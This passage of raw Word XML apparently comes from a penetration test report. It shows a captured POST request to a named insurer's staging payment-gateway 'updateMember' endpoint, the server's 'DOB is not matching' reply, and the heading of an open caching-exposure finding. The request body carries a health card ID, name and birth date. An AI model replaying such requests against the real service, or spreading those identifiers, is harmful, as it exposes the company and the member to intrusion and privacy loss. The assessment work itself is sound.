                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC7110">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="009208B5" w:rsidRPr="00DC7110" w14:paraId="0CBE5F21" w14:textId="77777777" w:rsidTr="004E4D83">
              <w:trPr>
                <w:trHeight w:val="2343"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="0A3A7E56" w14:textId="77777777" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">POST </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>paymentgateway</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gofundhip</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/secure/v1/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gbd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/payments/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>updateMember</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="010D5DD9" w14:textId="77777777" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="78D5EE93" w14:textId="77777777" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Referer</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>: https://payment.sit2.va.anthem.com/sgofundhip/secure/addMember</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="422E65B4" w14:textId="77777777" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="090089C7" w14:textId="77777777" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="74B25388" w14:textId="77777777" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>healthCardId</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "979M62506",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="783B8A1B" w14:textId="77777777" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>firstName</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "Linda",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1F2E17D6" w14:textId="77777777" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>lastName</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "Feaster",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4655211E" w14:textId="77777777" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>dateOfBirth</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>": "03/08/2011",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4AE45477" w14:textId="77777777" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "action": "ADD"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="34892788" w14:textId="77777777" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="7E543CD7" w14:textId="21590A7D" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC7110">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC7110">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="009208B5" w:rsidRPr="00DC7110" w14:paraId="78278DB4" w14:textId="77777777" w:rsidTr="004E4D83">
              <w:trPr>
                <w:trHeight w:val="1263"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="00AF0BBB" w14:textId="77777777" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5661AFB7" w14:textId="77777777" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Date: Tue, 28 May 2019 19:25:59 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7C9EF4D1" w14:textId="77777777" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7922EC76" w14:textId="77777777" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Length: 93</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4BD6527E" w14:textId="77777777" w:rsidR="009208B5" w:rsidRPr="00DC7110" w:rsidRDefault="009208B5" w:rsidP="009208B5">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{"message":{"messageCode":"PP9004","</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>messageText":"DOB is not matching</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>"},"</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>ackStatus</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DC7110">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>":"Failed"}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="048FC5EA" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="002B2BEE" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B91CD87" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00397EF0" w:rsidRDefault="002B7238" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F143907" w14:textId="77777777" w:rsidR="00CF0DE5" w:rsidRPr="00397EF0" w:rsidRDefault="00CF0DE5" w:rsidP="00CF0DE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9594" w:type="dxa"/>
        <w:tblBorders>
          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2005"/>
        <w:gridCol w:w="7589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="552B6B0C" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F79646"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41A43FAB" w14:textId="177D1F1C" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00A82FF7" w:rsidP="00F03F96">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:bookmarkStart w:id="10" w:name="_Toc10703671"/>
            <w:r>
              <w:t>M2</w:t>
            </w:r>
            <w:r w:rsidR="00983E25" w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r w:rsidR="00983E25">
              <w:t xml:space="preserve">Information Exposure </w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:t>through</w:t>
            </w:r>
            <w:r w:rsidR="00983E25">
              <w:t xml:space="preserve"> Caching</w:t>
            </w:r>
            <w:r w:rsidR="00983E25" w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r w:rsidR="00983E25">
              <w:t>Open</w:t>
            </w:r>
            <w:bookmarkEnd w:id="10"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="73732299" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DB682B9"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CVSS Score and Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DC1EB77" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="0098400D" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId20" w:anchor="CVSS:3.0/AV:P/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N" w:history="1">
              <w:r w:rsidR="00983E25" w:rsidRPr="000976CA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
